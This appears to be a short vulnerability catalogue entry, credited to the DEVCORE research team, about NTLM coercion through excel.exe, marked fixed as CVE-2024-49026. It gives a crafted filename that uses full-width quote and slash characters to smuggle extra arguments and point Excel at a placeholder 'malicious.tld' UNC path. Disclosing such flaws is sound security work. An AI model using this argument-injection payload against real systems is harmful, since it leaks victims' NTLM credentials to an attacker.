.. /excel.exe
Star

Status: Fixed as CVE-2024-49026

Vendors:

Microsoft

NTLM Coercion

With the following filename, you are able to coerce the vitcim to initiate an NTLM authentication to a remote attacker.
```
AAAA＂ ＂／a＂ ＂＼＼malicious.tld＼xxx.XLSX
```
Use case
If certain parts of filename are controllable, the attacker can inject additional arguments.

Code Pages
125x, 874

Acknowledgements:

DEVCORE Research Team (@d3vc0r3)